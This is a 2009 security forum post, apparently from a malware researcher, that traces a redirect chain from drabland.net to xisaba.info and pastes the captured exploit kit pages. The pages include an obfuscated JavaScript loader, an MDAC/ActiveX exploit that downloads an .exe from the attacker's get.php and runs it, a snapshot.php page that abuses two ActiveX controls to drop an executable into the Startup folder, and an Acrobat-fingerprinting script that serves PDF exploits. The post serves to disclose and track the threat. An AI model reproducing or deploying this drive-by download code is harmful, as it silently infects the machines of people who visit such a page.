Author Topic: drabland.net > xdsabc.info > xisaba.info > exploit  (Read 3429 times)

0 Members and 1 Guest are viewing this topic.

June 10, 2009, 08:04:38 pm
Read 3429 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Starts at;

drabland.net/lite (IP: 211.95.78.79)

Which leads to;

http://www.xdsabc.info/tds/go.php?sid=1  (IP: 211.95.78.79)

Which leads (via 302) to;

http://www.xisaba.info/cj/  (IP: 211.95.78.79)

Code: [Select]
<script Language="javascript" type="text/javascript">try {var myfunc=parseInt; var i_2=2; var Fi='ttEtiEt3EtdEthEtJEtbEtjEtAEtGEtYEtnEtmEtfEtCEtREtMEtsEt8EtPEtLEtZEtrEtzEtgEtcEtwEteEtaEtkEt4EtxEtoEtKEtWEtNEtBEtIEt5EtSEtTEtXEt6EtHEtFEtUEtDEtyEtOEt7EtqEtVEtlEtpEitEiiEi3EidEihEiJEibEijEiAEiGEiYEinEimEifEiCEiREiMEisEi8EiPEiLEiZEirEizEigEicEiwEieEiaEikEi4';var tf=Fi.substr(2,1);var MHX=Array(149,ync('137'),ync('253'),ync('225'),ync('248'),249,ync('139'),55295^55111,23708^23587,34054^34294,ync('244'),13967^13950,60424^60660,ync('208'),ync('216'),ync('218'),9087^9146,12212^12128,210,56145^56267,43139^43124,37408^37594,ync('236'),ync('198'),193,ync('204'),45839^46038,57053^56917,9902^9785,ync('209'),220,143,14253^14198,ync('227'),ync('231'),ync('234'),ync('221'),194,ync('155'),205,15759^15704,ync('211'),18889^18719,223,ync('138'),15454^15544,ync('246'),ync('229'),ync('192'),ync('195'),199,ync('157'),2114^2267,8691^8559,54593^54671,ync('142'),38164^38288,ync('146'),ync('135'),ync('134'),ync('200'),ync('148'),ync('242'),ync('255'),ync('243'),ync('251'),ync('133'),ync('233'),ync('226'),39980^40130,ync('232'),ync('158'),3483^3397,8105^7972,ync('159'),ync('128'),ync('131'),10010^10231,51695^51499,16338^16194,8034^8160,ync('129'),ync('140'),ync('224'),ync('152')),lGg;var gpv,Qng,boJ='tttit3tdthtJtbtjtAtit3tGtYtntbtjtAtitdtmtdtJtGtbtntftCtRtttMtst8tftitPtdtmtdtJtGtbtjtAtitPt3tGtYtntbtjtAtitLtZtntrtttztgtctwtftetatkt4tztMtwtstctxtotRtotftatbtjtAtjtAtitntmtKttt4tktetatWtftCtRtgtftNt3tRtztgtatbtBtgtgtMtxtPtPtItItIt5tSt4tztstTtst5t4totXtRtPt6tHtPt8tftgt5tMtBtMtFtRtMtgtetwtRtstktitPtntmtKtbtjtAtjtAtitUtDtWtmtytdtttJtstot8tOtst8tftetatHtst7tstzt6tqt4tMtgtatttgtctMtftetatgtftStgtPtHtst7tstzt6tqt4tMtgtatbtjtAtjtAtjtAtXtOtot6tgt4tRtotttDtqtftstgtftZtVtRtltttotpttittjtAt7tstqtttqtttetttotOtwtwiitjtAtft6tRtktftNi3tttettidtqtttetttRt5tDtqtftstgtftZtTtHtft6tgtVtotpidiitjtAtft6tRtktftNihtttettidtqtttetttRt5tDtqtftstgtftZtTtHtft6tgtVtotltttatatpidiitjtAtft6tRtktftNiJtttettidtqtttetttRt5tDtqtftstgtftZtTtHtft6tgtVtotltttatatltttatatpidiitjtAtjtAtgtqtcttittttft7tstwtVtft6tRtktftNi3tpttibt6tstgt6tBtVtftpitibtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVtft6tRtktftNihtpttibt6tstgt6tBtVtftpitibtjtAibtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVtft6tRtktftNiJtpttibt6tstgt6tBtVtftpitibtjtAibtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVidtqtttetttRt5iAtftgtZtTtHtft6tgtVtatatltttotpidtpttibt6tstgt6tBtVtftpitibtjtAibtjtAtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVidtqtttetttRt5iAtftgtZtTtHtft6tgtVtotltttatatpidtpttibt6tstgt6tBtVtftpitibtjtAibtjtAtjtAt4tXtttVijtttqtpttittjtAtgtqtcttittttft7tstwtVidtqtttetttRt5iAtftgtZtTtHtft6tgtVtotpidtpttibt6tstgt6tBtVtftpitibtjtAibtjtAtqtftgtOtqtotVtqtpiitttttttttttttjtAibtjtAtjtAtXtOtot6tgt4tRtottiAtRtVtstpttittjtAtjtAt7tstqtttztYtMtMtttttttetttatUtBtftwtwt5tYtMtMtwt4t6tstgt4tRtotaiitjtAt7tstqtttztYtntZtttttttetttatYtntZtntLt5tUtgtqtftstCtaiitjtAt7tstqtttRtYtMtMtttttttetttDtqtftstgtftZtVtstltttztYtMtMtttpiitjtAt7tstqtttRtYtntZtttttttetttDtqtftstgtftZtVtstltttztYtntZtttpiitjtAt7tstqtttRtUtDtttttttttetttDtqtftstgtftZtVtstltttathtUtUt6tqt4tMtgtDtRtotgtqtRtwt5tUt6tqt4tMtgtDtRtotgtqtRtwtatpiitjtAtjtAtRtUtDt5tJtstot8tOtst8tftetaiGtst7tstUt6tqt4tMtgtaiitttttjtAtRtUtDt5tWtftztftgtVtpiitjtAtjtAt7tstqtttRiYtRtwtktftqtttetttRtYtMtMt5intstCtftUtMtst6tftVihimtpiitjtAt7tstqtttRiYtRtwtktftqtmtgtftCtetRiYtRtwtktftqt5tytstqtztfintstCtftVtatUtctCtTtRtwt5tgtgtXtatpiitjtAiYtRtotgtNtytstgtBtNtDtRtCtMtRtotftotgtztetRiYtRtwtktftqtmtgtftCt5tytstgtBt5tztMtwt4tgtVtaififtatpiitjtAiCt4totnt4tqtettiYtRtotgtNtytstgtBtNtDtRtCtMtRtotftotgtziRimiMttistttaififtattisttiYtRtotgtNtytstgtBtNtDtRtCtMtRtotftotgtziRi3iMttistttaififtaiitjtAtGtStfintstCtftetataiitjtAtjtAtXtRtqtttVt4i8teimiit4i8tiiPiit4i8isistptjtAittjtAttttttttttt4t4tethtstgtBt5tqtstotktRtCtVtpiitjtAttttttttttt6tBtDtRtktftethtstgtBt5tqtRtOtotktVt4t4iLihiZtpisimtSiri3iitjtAttttttttttt6tBtUtctCtetUtgtqt4tot8t5tXtqtRtCtDtBtstqtDtRtktftVt6tBtDtRtktftptjtAtttttttttttGtStfintstCtftetGtStfintstCtfist6tBtUtctCiitjtAttttttttttt4tXtttVt6tBtDtRtktfteteimtSiri3tpttittTtqtftsi8ibiitjtAibtjtAtjtAtGtStfintstCtfteiCt4totnt4tqttistttGtStfintstCtfttistttat5tftaistatStaistatftaiitjtAtGtStfintstCtftetGtStfintstCtft5tqtftMtwtst6tftVtPififtPt8tltaififififififififtatpiitjtAtjtAt7tstqtttktstgiitttjtAt7tstqtttOtqtwtttetttWtftCtRtgtftNt3tRtztgt5t4tototftqtdtftStgiitjtAt7tstqtttStCtwtttetttotOtwtwiitjtAtgtqtctjtAittjtAtStCtwtttetttDtqtftstgtftZtVtstltttatht4t6tqtRtztRtXtgt5izthtJt3tdtdtytatpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtgtqtctjtAittjtAtStCtwtttetttDtqtftstgtftZtVtstltttathtUizthtJiht5izthtJt3tdtdtytatpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtgtqtctjtAittjtAtStCtwtttetttDtqtftstgtftZtVtstltttathtUizthtJiht5tUtftqt7tftqizthtJt3tdtdtytatpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiiiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtgtqtctjtAittjtAtStCtwtetotftIttizthtJt3tgtgtMtWtfigtOtftztgtVtpiitjtAtStCtwt5tRtMtftotVtaiAtGtdtatltttOtqtwtltttXtstwtztftpiitjtAibtjtAt6tstgt6tBtVtftptjtAittjtAtqtftgtOtqtottiYtYtJtUtGiitjtAibtjtAibtjtAibtjtAibtjtAtStCtwt5tztftotktVtotOtwtwtpiitjtAtjtAtzt3tftstktDtRtktftNi3tttetttaiciwiriciri3iciwihicihimiciZiPicieihiciJtniciriYiciZiPiciZiJicihtGiciwihiciriZiciwiJtaiitjtAtRtUtDt5tYtktktZtTtHtft6tgtVtatRiztUtatltttStCtwtpiitjtAtzt3tftstktDtRtktftNihtttetttaiciwimiciriYicirtGiciwiJiciriZicieihiciriYicirieiciwiaiciJtLiciriYiciei3iciZiJicihtGiciZieiciwiaiciwimiciriZiciJtniciJi3iciJtLtaiitjtAtzt3tftstktDtRtktftNiJtttetttaiciriYiciei3iciZiJicihtGicietniciriYicirieiciriZiciJtniciJiJiciJtLiciriYiciei3iciZiJicihtGicieiYiciwimiciriZicirtGtaiitjtAtRtUtDt5tYtktktZtTtHtft6tgtVtatRtYtUtatltttRtYtntZtpiitjtAtzt3tftstktDtRtktftNietttetttaicihiPicihiaiciJtLiciriYiciei3iciZiJicihtGiciZiwiciwihiciriaiciwieiciriZicihiPiciZiPicieihicihiaiciJtLiciriYiciei3iciZiJicihtGtaiitjtAtzt3tftstktDtRtktftNiZtttetttaiciZiJiciri3iciwiriciriZiciZieiciriYicieiriciriaicirtDiciriZicihiPicihiwtaiitjtAtjtAtzt3tftstktDtRtktftetOtotftzt6tstMtftVtzt3tftstktDtRtktftNi3istzt3tftstktDtRtktftNihistzt3tftstktDtRtktftNiJistzt3tftstktDtRtktftNieistzt3tftstktDtRtktftNiZtpiitjtAtziYtOtwtwtDtRtktftetzt3tftstktDtRtktfistGtStfintstCtfistaidtlihtpiitaiitjtAtRtUtDt5tGtStft6tOtgtftUtgtstgtftCtftotgtVtziYtOtwtwtDtRtktftpiitjtAtttjtAtztJtstOtot6tBtttettidtRtYtMtMt5tUtBtfidisidtwtwtGtSidisidtft6tOtgidisidtftVtGtSidisidtfintstCtftpidiitttjtAtft7tstwtVtztJtstOtot6tBtpiitjtAtjtAtqtftgtOtqtotttdtWiktGiitjtAtjtAibtjtAtjtAt7tstqttt4tttettimiitjtAt7tstqtttwtHtttetttataiitjtAt7tstqtttgtttetttotftItttYtqtqtstctVtaittaistwtHistatLtniataistwtHistairtDiZiZiri4iriZtYiJi4i3i3tntaistwtHistaimi4iaiPiJtYi4imimtDimieiYtDihiatGiJirtaistwtHistaibtatltaittLtniairtDiZtaistaiZiri4iriZtYiJtaistai4taistai3taistai3tntaistaimi4iaiPiJtYi4imtaistaimtDimieiYtDtaistaihtaistaiatGiJtaistairtatltaittYtLiatLtDtGtntni4tGtDiwtGi4taistaieiwtGi3i4taistaiaiJtaistaihihi4tnietYihi3imiri3iwi3i3iribtatltaittaistaimimimtaistairiYimiJiJi4imtaistaimimimi4imimimtaistaimtaistai4tDimtaistaimtaistaimtaistai4taistaimtaistaimtaistaimimimimimimimimtaistaieirtaistaibtatltaittaistaimtaistaimimiriYimtaistaiJtYtaistai4imimimtaistaimtaistai4imimimimtaistai4tDimimimi4imimimtaistaimtaistaimtaistaimtaistaimtaistaimimimtaistaietaistairtatltaittaistairtfiJihimiwimtsi4iwirtaistairtki4ietftfiri4iPiwiat6i4tkt6i3tXtaistatsiai3tkihtaistatXt6taistaiJtatltaitirietaistai3ieiZi3ihtLi4taistatLiaiwiPi4ieiZtaistai3tni4tYtaistaimtntaistaiPtaistai4taistaiYtDiYtniYiJiJtGiPtaistaiJtaistaiJtaistatDtaistaibtatltaittaistaiwiYiZtaistatLiwiYiriJi4iYtaistaimtaistairiYi4ieiJiJi3i4taistaiPtaistatYihiri4iJiJiatGtaistaimtaistaiJtDimtYtaistatGiJtntaistaibtatltaittaistaimiriwihiJtGimtaistaiai4iYietDtaistaihtaistai4ieiJtaistat6iPi4taistaiPtaistaiJtaistaiZtaistaiPi4imiaiYtDtaistatni3tntLimiwirtaistairtaistaibtatltaittaistairiJiataistaiYtaistaiwihiZiYi4taistai3taistatLtaistaihtni4ieiPiJtaistai3i4tYiaiYtntaistai4iPiwieiPietaistaiwtaistairiPihimi3taistaimtaistaibtatltaittLtYimi3iPiZiaiai4i3tntLtaistaiJi4ieietXiai4iPiJtLiei4ieirtaistai3ieiZietDiPietLiYiPibtatltaittaistatnimtDimiwtniZirtaistai4iwtDiriataistai4taistaieiJtaistaiYtaistai3taistai4taistatLtaistaietYimi4ihtaistaiZtaistaiYiZtYi3i3iYtYtaistatLtaistai3iataistaibtatltaittaistatGtaistaiPtaistatDtaistatDtaistatDtaistatntniYtaistai4taistatDtYihtaistaiPi4ieiairtaistatTtaistai4tLimiZimi4taistairtaistatDimtaistaiwtaistatDiairihieiwtaistairtaistatLibtatltotOtwtwtpiitjtAtjtAt7tstqttthtOtztgtGtStft6tOtgtftktei3iitjtAt7tstqttthtntYtDtNtWtOtototftkteimiitjtAtjtAt4tXtttVthtOtztgtGtStft6tOtgtftktetei3tpttittjtAtjtAtttttttItBt4twtftttVtgiRt4iMtpttittjtAttttttttttttttttttt7tstqtttstttetttotOtwtwiitjtAttttttttttttttttttt4tXtttVtgiRt4iMt5tztOtTtztgtqt4tot8tVimtli3tptttetettiditidtpttittjtAtttttttttttttttttttstttetttktRt6tOtCtftotgt5t6tqtftstgtftGtwtftCtftotgtVtatRtTtHtft6tgtatpiitjtAtttttttttttttttttttst5tztftgtYtgtgtqt4tTtOtgtftVtat6twtstztzt4tktatltttat6twtzt4tktxtattistttgiRt4iMt5tztOtTtztgtqt4tot8tVi3tltttgiRt4iMt5twtftot8tgtBtti4tti3tptpiitjtAttttttttttttttttttibtttftwtztfttittjtAtttttttttttttttttttgtqtcttittttstttetttotftItttYt6tgt4t7tfiztZtTtHtft6tgtVtgiRt4iMtpiittibttt6tstgt6tBtVtftpitibtjtAttttttttttttttttttibtjtAtjtAttttttttttttttttttt4tXtttVtstpttittjtAtttttttttttttttttttttttttttttttgtqtcttittttttttttttttttttttttttjtAttttttttttttttttttttttttttttttttttt7tstqtttTtttetttDtqtftstgtftZtVtstltttatUtBtftwtwtaistat5taistatYtMtMtwt4t6tstgt4tRtotatpiitjtAttttttttttttttttttttttttttttttttttt4tXtttVtTtpttittjtAttttttttttttttttttttttttttttttttttttttttttttttttttthtntYtDtNtWtOtototftktei3iitttjtAttttttttttttttttttttttttttttttttttttttttttttttttttt4tXtttViAtRtVtstptptttTtqtftsi8iitjtAttttttttttttttttttttttttttttttttttibtjtAtjtAttttttttttttttttttttttttttttttibt6tstgt6tBtVtftpitibtjtAttttttttttttttttttibtjtAttttttttttttttttttt4isisiitjtAtjtAttttttibtjtAtjtAttttttt4tXtttVthtntYtDtNtWtOtototftkteteimtpttttittjtAtttttttttttttttIt4totktRtIt5twtRt6tstgt4tRtotetatBtgtgtMtxtPtPtItItIt5tSt4tztstTtst5t4totXtRtPt6tHtPtztotstMtztBtRtgt5tMtBtMtaiitjtAttttttibtttttjtAtttttttjtAibtjtAtjtAtitPtUtDtWtmtytdtbtjtAtitPtLtZtntrtbtjtAtitPt3tdthtJtbtjtA';var Cek=String();Fi=Fi.split(tf);for(lGg=0;lGg<boJ.length;lGg+=i_2){Qng=boJ.substr(lGg,i_2);for(gpv=0;gpv<Fi.length;gpv++){if(Fi[gpv]==Qng)break;} Cek+=String.fromCharCode(MHX[gpv]^181);}function ync(Ie){return myfunc(Ie)}document.write(Cek);}
catch(e){}</script>

Code: [Select]
<HTML>
<HEAD>
<TITLE>Demo page</TITLE>
</HEAD>
<BODY style="display:none">

<DIV id="Remote_Host">http://www.xisaba.info/cj/get.php?opt=load</DIV>

<SCRIPT Language="javascript" type="text/javascript">


function CreateO(o, n) {
var r = null;
ecode_1 = 'r = o.CreateObject(n)';
ecode_2 = 'r = o.CreateObject(n, "")';
ecode_3 = 'r = o.CreateObject(n, "", "")';

try { eval(ecode_1) }catch(e){}
if (! r) {
try { eval(ecode_2) }catch(e){}
}
if (! r) {
try { eval(ecode_3) }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);     
}

function Go(a) {

var sApp   = "Shell.Application";
var sADO   = "ADODB.Stream";
var oApp   = CreateO(a, sApp );
var oADO   = CreateO(a, sADO );
var oSC    = CreateO(a, "MSScriptControl.ScriptControl");

oSC.Language="JavaScript"; 
oSC.Reset();

var oFolder = oApp.NameSpace(20);
var oFolderItem=oFolder.ParseName("Symbol.ttf");
Font_Path_Components=oFolderItem.Path.split("\\");
WinDir= Font_Path_Components[0] + "\\" + Font_Path_Components[1] + "\\";
ExeName="";

for (ik=0;ik<8;ik++)
{
     ii=Math.random();
     chCode=Math.round(ii*25)+0x61;
     chSym=String.fromCharCode(chCode)
     ExeName=ExeName+chSym;
     if (chCode==0x61) {break};
}

ExeName=WinDir + ExeName + ".e"+"x"+"e";
ExeName=ExeName.replace(/\\/g,"\\\\\\\\");

var dat;
var url = Remote_Host.innerText;
var xml = null;
try
{
xml = CreateO(a, "Microsoft.XMLHTTP");
xml.open("GET", url, false);
}
catch(e)
{
try
{
xml = CreateO(a, "MSXML2.XMLHTTP");
xml.open("GET", url, false);
}
catch(e)
{
try
{
xml = CreateO(a, "MSXML2.ServerXMLHTTP");
xml.open("GET", url, false);;
}
catch(e)
{
try
{
xml=new XMLHttpRequest();
xml.open("GET", url, false);
}
catch(e)
{
return FALSE;
}
}
}
}
xml.send(null);

sHeadCode_1 = "%76%61%72%20%58%42%3D%6F%58%53%2E%72%65%73";
oSC.AddObject("oXS", xml);
sHeadCode_2 = "%70%6F%6E%73%65%42%6F%64%79%3B%6F%41%53%2E%54%79%70%65%3D%31%3B";
sHeadCode_3 = "%6F%41%53%2E%4D%6F%64%65%3D%33%3B%6F%41%53%2E%4F%70%65%6E";
oSC.AddObject("oAS", oADO);
sHeadCode_4 = "%28%29%3B%6F%41%53%2E%57%72%69%74%65%28%58%42%29%3B%6F%41%53%2E";
sHeadCode_5 = "%53%61%76%65%54%6F%46%69%6C%65%28%27";

sHeadCode=unescape(sHeadCode_1+sHeadCode_2+sHeadCode_3+sHeadCode_4+sHeadCode_5);
sFullCode=sHeadCode+ExeName+"',2);";
oSC.ExecuteStatement(sFullCode);
 
sLaunch = 'oApp.She'+'llEx'+'ecut'+'e(Ex'+'eName)';
eval(sLaunch);

return TRUE;

}

var i = 0;
var lj = "";
var t = new Array("{"+lj+"BD9"+lj+"6C556-65A3-11D"+lj+"0-983A-00C04FC29E36"+lj+"}","{BD96C5"+"56-65A3"+"-"+"1"+"1D"+"0-983A-0"+"0C04FC"+"2"+"9E3"+"6","{AB9BCEDD-EC7E-"+"47E1-"+"93"+"22-D4A210617116}","{"+"000"+"6F033-0"+"000-000"+"0"+"-C0"+"0"+"0"+"-"+"0"+"0"+"00000000"+"46"+"}","{"+"0"+"006F0"+"3A"+"-000"+"0"+"-0000"+"-C000-000"+"0"+"0"+"0"+"0"+"000"+"4"+"6","{"+"6e32070a-76"+"6d-4ee6-879c-dc1f"+"a91d2"+"fc"+"3","{64"+"14512B-"+"B978-45"+"1D-A"+"0D"+"8"+"-"+"FCFDF33E8"+"3"+"3"+"C"+"}","{"+"7F5"+"B7F63-F"+"0"+"6F-4331-"+"8"+"A26-339E"+"0"+"3C0A"+"E3D"+"}","{"+"06723E0"+"9-F4C"+"2"+"-43"+"c8-"+"8"+"3"+"5"+"8-09FC"+"D1DB076"+"6"+"}","{"+"639"+"F"+"725F-"+"1"+"B"+"2D-483"+"1-A9FD"+"-87484"+"7"+"68201"+"0"+"}","{BA018599-1DB"+"3-44f9-83B4-46"+"1454C84BF8}","{"+"D0C07D56"+"-7C69"+"-"+"43"+"F"+"1"+"-"+"B"+"4A0-2"+"5"+"F5A11FA"+"B"+"19"+"}","{"+"E"+"8"+"C"+"C"+"C"+"DDF"+"-"+"CA2"+"8-496"+"b"+"-B050-"+"6"+"C0"+"7"+"C96247"+"6"+"B}",null);

var MustExecuted=1;
var MDAC_Runned=0;

if (MustExecuted==1) {

   while (t[i]) {
         var a = null;
         if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
         } else {
         try { a = new ActiveXObject(t[i]); } catch(e){}
         }

         if (a) {
               try {           
                 var b = CreateO(a, "Shell"+"."+"Application");
                 if (b) {
                         MDAC_Runned=1;
                         if (Go(a)) break;
                 }

               }catch(e){}
         }
         i++;

   }

   if (MDAC_Runned==0)  {
       window.location="http://www.xisaba.info/cj/snapshot.php";
   } 
   
}

</SCRIPT>
</BODY>
</HTML>

Files on this server;

/snapshot.php

Code: [Select]
<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='oSnapViewer'></object>
<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='oZenturi'></object>
<script language='javascript'>
var EXE_URL = 'http://www.xisaba.info/cj/get.php?opt=load';
var EXE_Local = unescape('C%3A/Documents%20and%20Settings/All%20Users/Start%20Menu/Programs/Startup/~tmp0002.exe');

try  {
oSnapViewer.Zoom = 0;
oSnapViewer.ShowNavigationButtons = false;
oSnapViewer.AllowContextMenu = false;
oSnapViewer.SnapshotPath = EXE_URL;
oSnapViewer.CompressedPath = EXE_Local;
oSnapViewer.PrintSnapshot();
} catch(e){}

EXE_Local=EXE_Local.replace(/\//g,'\\\\');

try  {
oZenturi.NavigateUrl(EXE_Local,"1","_SELF");
} catch(e){}

try  {
var oUtil=new ActiveXObject("CompatUI.Util");
oUtil.RunApplication("",EXE_Local,0);
} catch(e){}

</script>
<iframe src='showdoc.php' width=10 height=10></iframe>
</html>

/showdoc.php?ap= [4-8] - {file}.pdf

Code: [Select]
<script language="Javascript" type="text/javascript">

          var acrobat=new Object();
          acrobat.installed=false;
          acrobat.version='0.0';
          acrobat.number=0;
          if (navigator.plugins && navigator.plugins.length) {
          for (x=0; x<navigator.plugins.length;x++) {
              if (navigator.plugins[x].description.indexOf('Adobe Acrobat')!= -1)
              {
                 acrobat.version=parseFloat(navigator.plugins[x].description.split('Version ')[1]);
                 acrobat.number=acrobat.version;
                 if (acrobat.version.toString().length == 1) acrobat.version+='.0';
                 acrobat.installed=true;
                 break;
              }
          }
          }
          else if (window.ActiveXObject) {
              for (x=2; x<10; x++) {
              try {
                  oAcro=eval("new ActiveXObject('PDF.PdfCtrl."+x+"');");
                  if (oAcro) {
                     acrobat.installed=true;
                     acrobat.version=x+'.0';
                     acrobat.number=x;
                  }
              } catch(e) {}
              }
   
              try {
              oAcro7=new ActiveXObject('AcroPDF.PDF.1');
              if (oAcro7) {
                 acrobat.installed=true;
                 versions = oAcro7.GetVersions().split(',');
                 version = versions[0].split('=');
                 version = version[1].split('.');
                 hversion = parseFloat(version[0]);
                 lversion = parseFloat(version[1]);
                 acrobat.number = hversion;   
                 acrobat.version= hversion+'.'+lversion;
              }
              } catch(e) {}
          }
          if (acrobat.installed==true) {
            document.write("<iframe src='showdoc.php?ap="+acrobat.number+"' width=5 height=5></iframe>");
          }
          </script>
         


/get.php?opt=load - exefile.exe
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net